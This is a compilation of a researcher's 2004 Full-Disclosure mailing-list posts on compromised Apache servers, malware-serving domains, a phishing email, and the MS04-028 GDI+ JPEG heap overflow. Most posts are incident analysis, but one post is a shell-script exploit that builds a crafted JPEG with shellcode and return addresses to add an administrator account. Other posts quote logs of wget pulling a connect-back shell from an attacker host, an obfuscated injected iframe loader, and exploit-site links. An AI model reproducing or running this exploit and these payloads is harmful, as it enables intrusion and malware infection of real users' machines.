Re: [Full-Disclosure] Online Script Decoder

[Elia Florio]

>http://www.greymagic.com/security/tools/decoder/
Is anyone able to decode this malware/exploit script-encoded :

http://www.antiblock.biz/user256/2DimensionOfExploitsEnc.php

it's a different layer of encoding/encrypting...or it's
only a bad-encoded script?

EF


Messaggio inviato da
Edizioni Master Webmail
http://mbox.edmaster.it

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Is www.sco.com hacked?

[Elia Florio]

There are these two JPG files on www.sco.com :

(the good one)
http://www.sco.com/images/landing_pages_new/webinar_land2.jpg

(the supposed hacked one)
http://www.sco.com/images/landing_pages_new/webinar_land2-1.jpg

These are the JFIF headers of the images:

(the good one)
0100  FF D8 FF E0 00 10 4A 46-49 46 00 01 02 01 00 48   ..JFIF.H
0110  00 48 00 00 FF E1 0C 22-45 78 69 66 00 00 4D 4D   .H."Exif..MM
0120  00 2A 00 00 00 08 00 07-01 12 00 03 00 00 00 01   .*..
0130  00 01 00 00 01 1A 00 05-00 00 00 01 00 00 00 62   ...b
0140  01 1B 00 05 00 00 00 01-00 00 00 6A 01 28 00 03   ...j.(..
0150  00 00 00 01 00 02 00 00-01 31 00 02 00 00 00 14   .1..

(the supposed hacked one)
0100  FF D8 FF E0 00 10 4A 46-49 46 00 01 02 00 00 64   ..JFIF.d
0110  00 64 00 00 FF EC 00 11-44 75 63 6B 79 00 01 00   .d..Ducky...
0120  04 00 00 00 3C 00 00 FF-EE 00 0E 41 64 6F 62 65   <..Adobe
0130  00 64 C0 00 00 00 01 FF-DB 00 84 00 06 04 04 04   .d..
0140  05 04 06 05 05 06 09 06-05 06 09 0B 08 06 06 08   
0150  0B 0C 0A 0A 0B 0A 0A 0C-10 0C 0C 0C 0C 0C 0C 10   

 I remember the "Ducky Adobe" strings in the
crafted JPEGs of GDI+ bugs.maybe just a coincidence?

EF


Messaggio inviato da
Edizioni Master Webmail
http://mbox.edmaster.it

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] MSIE src&name property disclosure

[Elia Florio]

Common laws in IT-security:

I° Micro$oft bugs law :
"a bug is a bug only if found in competitor's software (or if it
could be used in any commercial report to show Windoze
better&stronger than other OSes)."

II° Micro$oft bugs law :
"Windoze has only bugs that M$ said it has; every other bug, found
by bad-and-evil-security-guys is not a bug."

III° Micro$oft bugs law :
"every bug discovered by others is only a windows update problem or
a missing feature of operating system which will be fixed in next
service pack"

IV° Micro$oft bugs law :
"if we found a bug by ourselves...we fix it in the darkness
and then erase programmers memories to avoid that they one day
could remember about it"

:)


Messaggio inviato da
Edizioni Master Webmail
http://mbox.edmaster.it

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Rv: [Full-Disclosure] MSIE and tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!))

[Elia Florio]

Good job, the xploit works on both my :

IE 6.0.2800.1106 ENGLISH with SHDOCVW.DLL version 6.0.2800.1400
IE 6.0.2800.1106 ITALIAN with SHDOCVW.DLL version 6.0.2800.1584

Tested on both Win XP Professional - SP1 with
latest October patch installed.

The overflow occurs in this point of SHDOCVW.DLL (with EAX = 0D0D0D0D)

7178E69E   8B40 34  MOV EAX,DWORD PTR DS:[EAX+34]
7178E6A1   85C0 TEST EAX,EAX
7178E6A3   74 21JE SHORT SHDOCVW.7178E6C6
7178E6A5   8B75 0C  MOV ESI,DWORD PTR SS:[EBP+C]
...
...

EF

PS: after testing the xploit, Windows increased the swap
file dimension sayin' VM memory too low, is this a side-effect of
exploit?


Messaggio inviato
da Edizioni Master Webmail
http://mbox.edmaster.it

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Hackers of [xpire.info] use an unknown Apache 1.3.27 exploit???

[Elia Florio]

> Hi,
> It appears that the signature is
>
>  C6C22C  mov dl, 2C
> 0003 37  aaa
> 0004 60  pushad
> 0005 C1EFD4  shr edi, D4
> 0008 C4922264C66Ales edx, dword ptr [edx+6AC66422]
> 000E E10Dloopz 001D
> 0010 8A6A5F  mov ch, byte ptr [edx+5F]
> 0013 D44Eaam (base78)
> 0015 91  xchg eax,ecx
> 0016 10044D  adc byte ptr [2*ecx+104D044D], al
>
> The beginning & the end of the disassembly may be wrong if the signature
> is not complete. However it doesn't make much sense globally and this
> code is too short to see a potential attack : no memory is written here.
> By the way, where is this signature from ?

Someon (Peter Kosinar) suggests to me that this bytes pattern
is a potential command directed to "suckit" rootkit over port 80;
the firs bytes are a kind of autentication hash and the final bytes
are changing cause it's a port numberStill investigating on this...

Your work is great, but maybe this isn't an attack
pattern, so the bytes are not asm inscrutions! Thank you anyway...

The signature comes from different compromised
error logs of Apache 1.3.27 with PHP4.2.3.

I've contacted the sysadmins of IP originating this attacks,
cause someone else suggests to me that also the attacking hosts
are compromised boxes used by this hacker crew
They own a lot of Apache *nix server worldwide :((

216.40.203.9 : ns1.tnet.ch : An old Cobalt RaQ server, with very poor
security.
OrgName: Everyones Internet, Inc.
Country: US
-
140.105.55.159 : dschrahm3.univ.trieste.it .
netname: TRIESTE-NET
descr: Universita' degli Studi di Trieste
-
195.140.140.122 : from France :
netname: CTN-1
-
212.78.145.16 : Another old Cobalt server from Spain :
Hostname : 16.red-212-78-145.user.auna.net
netname: MENTA-ECOM
descr: Cable i Televisio de Catalunya
descr: Internet de Banda Ampla
-
65.125.235.250 :
EZZI.NET Q0625-65-125-224-0 (NET-65-125-224-0-1)
65.125.224.0 - 65.125.239.255

EF


Messaggio inviato da
Edizioni Master Webmail
http://mbox.edmaster.it

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Hackers of [xpire.info] use an unknown Apache 1.3.27 exploit???

[Elia Florio]

Hi list,
I'm fighting again against an hackers crew
(I suppose the same mentioned in this link:
http://seclists.org/lists/incidents/2004/Jul/0056.html  )
which is installing various malware on many
compromised box to get group of zombies ready-to-run.
(follow my previous mail on "xpire.info" and "splitinfinity.info")

I've found in some logs that they use different exploits on port 80
but one exploit is specific for Apache 1.3.27 (with PHP/Perl
and other module installed).

It looks like an overflow, I know that 1.3.27 is a bugged version,
but I would to know if anyone have seen this code before:
Extracted from error log of Apache :

216.40.203.9 - - [28/Oct/2004:10:54:37 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_xd8(xcbtxa6xba"
400 299

140.105.55.159 - - [08/Oct/2004:15:55:35 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_x8ci7x9fx8cxec" 400
-

195.140.140.122 - - [11/Oct/2004:03:58:05 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_xc3x8cx8czxcfx19"
400 -

212.78.145.16 - - [13/Oct/2004:20:48:23 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_xd4Nx91x10x04M" 400
-

65.125.235.250 - - [28/Oct/2004:09:55:02 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_A}xebxfax8axe5"
400 - "-" "-"

65.125.235.250 - - [28/Oct/2004:09:55:58 +0200]
"xc6xc2,7`xc1xefxd4$xc4x92"dxc6jxe1rx8aj_A}xebxfax8axe8"
400 - "-" "-"

I would suggest to any sysadmin using Apache 1.3.27 to ban this subnet
from their hosts, cause all attacks are coming from these machines :

216.40.203.*,
140.105.55.*,
195.140.140.*,
212.78.145.*,
65.125.235.*
(...and obvious "xpire.info")

Someone suggests to me that they are related to :

Qwest Communications NET-QWEST-BLKS-4 (NET-65-112-0-0-1)
65.112.0.0 - 65.127.255.255
EZZI.NET Q0625-65-125-224-0 (NET-65-125-224-0-1)
65.125.224.0 - 65.125.239.255

The exploits left this signatures (i have to translate the opcodes into asm)
:

xC6 xC2 x2C x37 x60 xC1 xEF xD4 xC4 x92 x22 x64 xC6 x6A xE1 x0D x8A
x6A x5F xD4 x4E x91 x10 x04 4D

The last bytes are changing in every attempt, so this seems to be a
bruteforce attempt to get a valid return address to execute the exploit.

Probably the exploit works for a specific version of Apache/Linux Kernel,
so the hacker have to try many times with different ret. address to
find the right way to execute it.

Any comments?

EF


Messaggio inviato da
Edizioni Master Webmail
http://mbox.edmaster.it

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

[Elia Florio]

>> (for example Symantec and ClamAV don' recognize many malware
>> in this site, after a quick test made with www.virustotal.com)
>
> If you have some time, could you assist the clamav team and send them a
> detailed report with your findings and the undetected code bits?
>
> They will appreciate your cooperation in this.
>
> Hugo.

Of course, I'd like to support Clam teamthey're working
hard for a valuable open-source AV and I appreciate this too!
I can send to them my reports (extracted from virustotal.com) and
the un-detect files (exe,dll,class,javascript,html) with
malware/trojan and exploits taken from "xpire.info".

Where do I send this archive? What's the mail address?
Must I use a PGP key or simply a password-protected zip?

EF


Messaggio inviato da
Edizioni Master Webmail
http://mbox.edmaster.it

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

[Elia Florio]

Finally, I clean the compromised box of my friend :))
I've found (following many helpful suggestions of people in FD list)
that a variant of "suckit" rootkit was installed on this machine.
The strange thing is that "rkhunter" and "chkrootkit" don't catch it :
in any way and they said that everything is ok.

To found suckit and deactivate it I used this :
http://tsd.student.utwente.nl/skdetect/
It's a code based on suckit source code, but without the malware part.
It can dig into /dev/kmem and explores sys_call_table[];
skdetect was able to found suckit installed.
Another person who was compromised by the "xpire.info" hacker said to me
that
the symptoms were the same and also in his host he found this suckit variant
installed.

>suckit version 'Q' DETECTED
>kernel-part uninstall seems successful.

After reboot everything come back to normal activity.
Thank you to everyone for the answers given to me
(Ron DuFresne, Nick FitzGerald, Kevin and others).

Actually on "xpire.info/fa/?d=get" malware page you can found this exploits
in the wild :

#IFRAME SRC="http://www.sp2fucked.biz/user28/counter.htm"; WIDTH=0 BORDER=0
HEIGHT=0>http://xpire.info/fa/t3.htm"; width=1 height=1>http://xpire.info/fa/x.htm"; width=1 height=1>http://xpire.info/fa/proc.htm"; width=1 height=1>http://xpire.info/fa/runevil.htm"; width=1 height=1>http://213.159.117.133/dl/adv121.php"; width=1
height=1>http://x.full-tgp.net/?fox.com"; WIDTH=1 HEIGHT=1>

There a lot of backdoor/trojan ready-to-install and the bad news is that
most
of this malware are recompiled, so many AV are fooled and don't catch them
(for example Symantec and ClamAV don' recognize many malware
in this site, after a quick test made with www.virustotal.com)

Bye,
EF

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

[Elia Florio]

> I'm not sure that qmail-inject isn't a red herring?  The actual
> download looks like 'wget' was used.
Good suggestion, my friend :)

It was used WGET to retrieve the http://xpire.info/cli.gz connectback shell.
After other analysis I've found that another person had the same problem:

http://groups.google.it/groups?hl=it&lr=&selm=2wrKc-2TW-49%40gated-at.bofh.it

Here the log trapped by Apache :



[Mon Aug 23 06:25:18 2004] [notice] Accept mutex: sysvsem (Default:
sysvsem)
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
--18:06:28--  http://xpire.info/cli.gz
=> `/tmp/a.out'
Resolving xpire.info... done.
Connecting to xpire.info[202.99.23.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,147 [text/plain]

0K ..    100%   20.04
KB/s

18:06:29 (20.04 KB/s) - `/tmp/a.out' saved [19147/19147]


If you compare the output, it's possible to see that in my first showed log
the stdout
was in italian language (cause compromised server is .it), in this case is
in english language.
The hacker launched WGET command to retrieve his hacking tool in /tmp/a.out
In this log you can see also that the hacker also try to execute some "ls"
command,
as first trial to test vulnerability I suppose.
Moved by this, after other analysis I found that vulnerability used is an
obvious-but-effective PHP-Injection
using global variables (http://www.securityfocus.com/archive/1/218000 is a
good page to learn
something about this vuln).

The hacker page used to accomplish the injection are based on this
test-page, taken directly on the hacker-site :-)

http://xpire.info/s/2
http://xpire.info/s/

I notice that this site is full of trojan/backdoor/shell/worm/exploit and
other malwarewhy is it still open?

http://xpire.info/cli.gz// connect back shell
http://xpire.info/fa/aga.exe// agobot family
http://xpire.info/install.gz// some trojan/malware  my NortonAV
does not catch it; it's a Windows-EXE

This is the sample of PHP-Injection page:
".$OS."";
echo "".$X."";
?>









Using PHP "system" call, it possible to execute any remote command, like
WGET for example.
Anyone knows before this page???


> I assume you used a bootable CD on the infected machine to do the
checksums?
Unfortunately (I know that this is a *must* for a good analysis) I'm doing
the check remotely,
using SSH, so I cannot use a bootable CD to connect at this remote host very
far from me :)
I'm limited in the analysis.but the host is not mine!
However I think that md5um give me good results, because I compared all the
/usr/sbin directory
and all the checksum were good, except for /usr/sbin/crond..any ideas???
I used also "rpm -Vf" utility to cross check results, and were the same of
md5sum.

> Check the httpd.conf (and other apache configuration files) for any
> changes, and also the contents of each module loaded.  It's also
> possilble, but less likely, that the injection is done in a kernel
> module.
It's my fear :(( I studied all *.conf related to Apache/PHP modules
of this
machine, but nothing was found. A LKM injected could be the only response.

I also ran "chkrootkit" as someone suggest to me, but all the test give
positive answer
(no worm, no rootkit, no trojan)

> Sounds like a good time to replace the entire server with a fresh build.
Actually my work will finish when this activity will begin :))

Thank you for the help, Kevin.

EF

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

[Elia Florio]

Hi list,
i'm doing some analysis on a Linux-Mandrake 9.0 web server
of a person that was compromised in October.
In this host now it's installed a special trojan that insert a
malicious  tag into every served .PHP page.

The host is running these services :

Porta 21: 220 ProFTPD 1.2.5 Server (XXX FTP Server) [server]
Porta 22: SSH-1.99-OpenSSH_3.4p1
Porta 25: 220 X ESMTP 5.5.1
Porta 110: +OK <[EMAIL PROTECTED]>
Porta 3306: MySQL 3.23.52
Porte 80/443: Server: Apache-AdvancedExtranetServer/1.3.26 (Mandrake
Linux/6mdk)
sxnet/1.2.4 mod_ssl/2.8.10 OpenSSL/0.9.6g PHP/4.2.3

I've found inside Apache log that the hacker break-in inside the machine
using an overflow and injecting an executable /tmp/a.out via "qmail-inject".
These are the suspicious log lines :

[Sun Oct  3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation
fault (11)
[Sun Oct  3 04:08:34 2004] [notice] child pid 1272 exit signal Segmentation
fault (11)
[Sun Oct  3 07:18:27 2004] [notice] child pid 4397 exit signal Segmentation
fault (11)
[Mon Oct  4 02:27:55 2004] [notice] child pid 1203 exit signal Segmentation
fault (11)
qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S. CANNIZZARO"
<[EMAIL PROTECTED]>
[Mon Oct  4 18:43:02 2004] [notice] child pid 4248 exit signal Segmentation
fault (11)
[Mon Oct  4 22:58:50 2004] [notice] child pid 1190 exit signal Segmentation
fault (11)
[Tue Oct  5 11:58:13 2004] [notice] child pid 15689 exit signal Segmentation
fault (11)
qmail-inject: fatal: unable to parse this line:
To: Drugo:[EMAIL PROTECTED]
sh: -c: option requires an argument
--15:50:07--  http://xpire.info/cli.gz
   => `/tmp/a.out'
Resolving xpire.info... fatto.
Connecting to xpire.info[221.139.50.11]:80... connected.HTTP richiesta
inviata, aspetto la risposta... 200 OK
Lunghezza: 19,147 [text/plain]

0K ..    100% 9.97K

15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147]

[Fri Oct  8 20:26:52 2004] [notice] child pid 9647 exit signal Segmentation
fault (11)
[Sat Oct  9 01:09:51 2004] [notice] child pid 3840 exit signal Segmentation
fault (11)


Tryin a WGET of http://xpire.info/cli.gz , I get an ELF executable for
Linux,
possible containing a ConnectBack shell. Inside this ELF file you can grep
these strings:

Usage:  %s host port
 pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i Can't
fork pty, bye!
 Fuck you so
 /bin/sh No connect
 Looking up %s... Failed!
 OK
 %u Connect Back

I don't know if the hacker installs in this machine a rootkit, but the check
of md5sum of
ls, lsof, ps, netstat binaries with other ones from a clean Mandrake distr.
was good...

The main problem is finding how the Apache Server (or PHP) was altered by
the hacker,
because every user that connects to this host now, could be infected by
several HTML/IE recent exploits.
Sniffing an HTTP packet from this host, I've found that *SOMETIMES* (in a
random way??)
web server inserts a special javascript between HTTP-Header and served page.
The script is :


eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,1
01,40,34,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47
,47,119,119,119,46,115,112,108,105,116,105,110,102,105,110,105,116,121,46,10
5,110,102,111,47,102,97,47,63,100,61,103,101,116,39,32,104,101,105,103,104,1
16,61,49,32,119,105,100,116,104,61,49,62,60,47,105,102,114,97,109,101,62,34,
41))


Decoding it, I see that it writes inside the page an  tag pointing
to this url :



If you surf to this page (don't do this if you use IE or are not patched)
you could got infected
by several exploits, cause it opens a lot a  pointing out to
different domains.

I would to list here these domains, cause they are a sources
for exploit studying :

Domain: www.sp2fucked.biz
http://69.50.168.147/user28/counter.htm

Found MHTMLRedir.Exploit
http://213.159.117.133/dl/adv121.php

http://195.178.160.30/js.php?cust=28

http://195.178.160.30/ifr.php?cust=89

http://69.50.168.147/user28/exploit.htm

Found Java class exploit
http://69.50.168.147/user28/exploit2.htm

My questions are :

1) how can I remove this injected Javascript/IFRAME ? I've checked
httpd.conf and a lot of PHP pages,
but I don't found anything.Is it possible that the hacker install some
compromised Apache module ..so???

2) anyone knows before these sites (xpire.info or splitinfinity.info)?
why they are still online and are serving trojan/exploit on surfer browser?
xpire.info is related to "Mike Fox".but it sounds as a fake Jonh Doe
registration!

  Domain ID:  D5946452-LRMS
  Domain Name:  XPIRE.INFO
  Created On:  23-May-2004 19:41:15 UTC
  Last Updated On:  02-Aug-2004 08:07:20 UTC
  Expiration Date:  23-May-2005 19:41:15 UTC
  Sponsoring Registrar:  Direct Information Pvt Ltd. d/b/a Directi.com
(R159-LRMS)
  Status:  ACTIVE
  Status:  OK
  Registrant ID:  C4752858-LRMS
  Registrant Name:  Mike Fox
  Registrant Org

[Full-Disclosure] MS04-028 Exploit PoC II - Shellcode=CreateUser X in Administrators Group

[Elia Florio]

Hi list,
this is my final work for MS04-028 bug.it works,
after many suggestions and a deep look inside the heap overflow.
It uses shellcode (from metasploit) to add user "X" into Admin
group and works on different versions of GDI+.
No script-kiddies, no lamers: modify the right "bytes" in the script before
use it.

Byez and always support [full-disclosure] !

[eflorio]


-

#!/bin/sh
#
# MS04-028 Exploit PoC II with Shellcode: CreateUser X in Administrators
Group
#
# Tested on:
# WinXP Professional English SP1 - GDIPLUS.DLL version 5.1.3097.0
# WinXP Professional Italian SP1 - GDIPLUS.DLL version 5.1.3101.0
# (SP2 is not vulnerable, don't waste your time trying this exploit on it!)
#
# Usage:
#first,  replace the "\xCC" = INT3 instruction at beginning of shellcode
#second, choose a right ret address for GDI+ DLL and WinXP version
#then,  create crafted JPEG with: sh ms04-028.sh > img.jpg
#
# Created by:
#Elia Florio
#(heap overflow study purpose, not for lamerz, not for script-kiddie)
#
# Thanx to:
# jerome.athias
# metasploit.org
# idefense
# full-disclosure list

#
#Standard JPEG header
#
printf
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64\x00\x60\x0
0\x00"
printf
"\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00\x04\x00\x00\x00\x0A\x00\x0
0"
printf "\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65\x00\x64\xC0\x00\x00\x00\x01"

#
#Heap Overflow Trigger DWORD - 00 length field (01 works too)
#
printf "\xFF\xFE\x00\x01"


#
#Additional stuff to complete the header
#
printf  "\x00\x14\x10\x10\x19\x12\x19\x27\x17\x17\x27\x32"


#
#Sugg. by jerome.athias
# 1) Opening directly in IE
#Address to overwrite = RtlEnterCriticalSelection() - 4
#Check page 172 of SC Handbook for those of you playing along at home
#
printf "\xEB\x0F\x26\x32" #control ECX register


#
#Address of shellcode
#
printf "\x42\x42\x42\x42" #control EDX, left these values if u wanna raise
an exception and debug in GDI+
#printf "\xDC\xB1\xE7\x70" #70E7B1DC WinXP Professional English SP1 -
GDIPLUS.DLL version 5.1.3097.0
#printf "\xDC\xB1\x30\x78" #7830B1DC WinXP Professional Italian SP1 -
GDIPLUS.DLL version 5.1.3101.0


#
#end_of_jpeg_header
#
printf "\x26\x2E\x3E\x35\x35\x35\x35\x35\x3E"
#NOP1
printf "\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
printf "\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8"

#
#Image junk here...fake JPG
#
printf
"\x00\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07";
printf
"\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B\x0C\x19\x12\x13\x0F\x14";
printf
"\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20\x24\x2E\x27\x20\x22\x2C\x23\x1C";
printf
"\x1C\x28\x37\x29\x2C\x30\x31\x34\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C";
printf
"\x2E\x33\x34\x32\xFF\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D";
printf
"\x0D\x18\x32\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf
"\x32\x32\x32\x32\x32\xFF\xC0\x00\x11\x08\x00\x03\x00\x03\x03\x01\x22";
printf
"\x00\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01\x01";
printf
"\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05";
printf
"\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00\x02\x01\x03\x03\x02";
printf
"\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D\x01\x02\x03\x00\x04\x11\x05";
printf
"\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1\x08";
printf
"\x23\x42\xB1\xC1\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17";
printf
"\x18\x19\x1A\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43";
printf
"\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64";
printf
"\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83\x84\x85";
printf
"\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4";
printf
"\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\x

[Full-Disclosure] Control EDX/EAX in JPG Heap Overflow (MS04-028)

[Elia Florio]

Hi list,
I'm tryin' to study Heap Overflow 
mentioned by MS04-028 in GDIPLUS.DLL 
library.
 
After some test, I've found that the 
position of dword able to
control EDX register (as Nick D. said) is 
on the 5th DWORD,
counting after the malformed "FFFE" 
header.
 
A malformed JPEG header looks like this 
:
 
;
FF D8 FF E0 00 10 4A 46 49 46 00 01 00 
00 00 01;    ÿØÿà..JFIF..
00 01 00 00 FF FE 00 00 41 41 41 41 41 41 
41 41;    ÿþ..
41 41 41 41 41 41 41 41 43 43 43 43 41 41 
41 41;    
 
jpeg format continues
 

;
 
It's possible to use "FFFE0001" or 
"FFFE" as invalid comment length 
to force the heap overflow. The overflow is raised when GDI+ calls to 
NTDLL.RtlFreeHeapW
When we land in the exception area, OllyDbg 
shows this invalid instruction :
 
MOV DWORD PTR DS:[EDX], EAX
 
In this point we can control the value of 
EDX (it's overwritten by "" 0x43434343 dword inside JPEG header), but 
it's difficult escape from the heap and 
take the full control on execution.  
 
I've found the DWORD "28F0B600" used in the JPEG header in place of "", 

(reading it in reversed form is the 0xB6F028 address) can point [EDX] to the 
stack area and can be used to write here 
the next return value popped from 

RETN 0C instruction. This helps to control 
the execution flow from this point,
however when RETN 0C is executed, the IP 
will jump to EAX value that was stored 
in [EDX] before. Not good 
:(
 
Has anyone studied the overflow? Any 
suggestion???
 
[eflorio]

[Full-Disclosure] GDIPLUS VULN - MS04-028 - CRASH TEST JPEG

[Elia Florio]

Hi list,this is the JPEG able to reproduce the crashreported in
the bullettin MS04-028.http://www.microsoft.com/technet/security/bulletin/ms04-028.mspx
Look at FFFE0001 or FFFE signaturein the JFIF header.
Tested on Windows XP Prof SP1 [gdiplus.dll ver 5.1.3097.0]
[eflorio]


Messaggio inviato
da Edizioni Master Webmail
http://mbox.edmaster.it

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] New Win32 Worm regsvc32.exe offers rootkit features

[Elia Florio]

Hi list,
my Symantec AV Corporate Edition v 8.00.9374
with Scan Engine - 4.1.0.15 and last updates (28/3/2004 rev.50)
does not found any worm or virus in your file (regsvc32.exe).
Maybe a new worm or a modified old worm.

The file try to impersonate real "\WINDOWS\SYSTEM32\regsvr32.exe"
with a fake name, but instead is a worm compressed with ASPack 2.12.
If you look at import table, the worm seems to use
"NetShareEnum", "ShellExecuteA" and winsock API from Windows.

I think it's not a full-rootkit as you say, but maybe contains some stealth
code because import "EnumProcessModules" from psapi.dll, used to list
Windows process list.

EF

- Original Message - 
From: "Markus Koetter" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, March 30, 2004 6:29 PM
Subject: [Full-Disclosure] New Win32 Worm regsvc32.exe offers rootkit
features


> Hi,
> my girlfriend got a new? worm on her win2k desktop.
> The worm is quite aggressive in spreading, netstat -a did not find an
> end, i expect it to be a phatbot/agobot4 fork
> seems like it invaded on port 1025, i dont know which services were
> offerd there, but i saw several connections to port 1025.
>
> the virus offers rootkit capabilities, file and process hide, kills
> firewalls with specific names, and makes the system unusable after some
> uptime.
>
> i installed another firewall renamed the bin to "horst.exe" and got
> several connections to
> c:\winnt\services32\regsvc32.exe
> the file did not exists, neither the process in win2ks taskmanager.
>
> I was not able to remove the virus, so i plugged the machine of the net
> and told her to work offline.
> this worked well for ~4h, then the system became unstable and the floppy
> disk was screaming like a burning pig.
>
> I took my new knoppix cd 3.4, booted it, and used the live f-prot
> install to scan the system for viruses, the system got the latest
> definitions via web, and scanned ...
> No viruses were found.
>
> I mounted the hda1 windows partition and send me the "expected to be the
> virus file" on my own computer running linux
> the file is called regscv32.exe and has the
> md5sum 26a5dbd9add4b16b561cd916675c4439
>
> i expect it to be polymorph
>
> i lack solid skills in disassembler, but i would send this binary to
> fill-disc listed ppl asking for it.
>
> if i fail in my expectations, and this is a standard win32 binary, tell
> me (i cant check the md5sum myself, i lack a win32 system), and i will
> try to find the right binary again.
>
> my own conclusion,
> i will install debian unstable on her desktop for working, and win2k for
> printing on her linux incompatible lexmark printer.
> lilo offering 2 entries "write" "print"
>
> im sick off this ...
>
> Markus Koetter
>
> please mail me for the binary, im really intrested in a analysis report.
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Another false Citibank e-mail...a new phishing?

[Elia Florio]

I receveid this bad-spoofed-Citibank e-mail,
which points to a PHP page which ask 
for credit card number..and stole it!!!
Is it the next phishing e-mail ? 

The link points to http://218.36.71.193:443/citi/

It does not use "%01" exploit to show a spoofed-URL in the Explorer bar.

EF--- Begin Message ---
Title: Citibank








 
 

 

 
Citibank Notification
Dear citibank customer,
At Citibank, we value the trust you have placed in us by using our service to conduct your transactions.Because our relationship with you is financial in nature, the protection of your privacy is particularlyimportant to us.


We are sending this verification notice to provide you with information about how Citibank safeguards
your privacy, as well as to comply with U.S. federal privacy guidelines that apply to financial institutionssuch as Citibank. The full terms of Citibank's privacy policy are available on the Citibank website, which youare welcome to review at any time.

Please verify your account information by clicking on the link below:

Verify your accounts here

 



  
   
  






--- End Message ---

Re: [Full-Disclosure] Windows XP explorer.exe heap overflow

[Elia Florio]

> WinXP SP1 (fully patched) german is vuln to AN00010_.wmf
> explorer.exe hogs 100% cpu speed.
> tom

I can confirm that my WinXP SP1 (ITALIAN) fully patched
except for these two updates :

KB832894 - MS04-004 (%01 vuln in URL string)
KB828028 - MS04-007 (ASN.1 library bug)

is vuln. to malformed EMF and WMF files.

EXPLORER.EXE goes to 99% CPU usage during preview/rendering of malformed
images.

I've tried to attach a .WMF in a mail message and also Outlook Express
is vuln.; when user receives an email message, OE try to display preview of
images and hang up. Killing OE will not cause any problem to EXPLORER.EXE.

EF

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html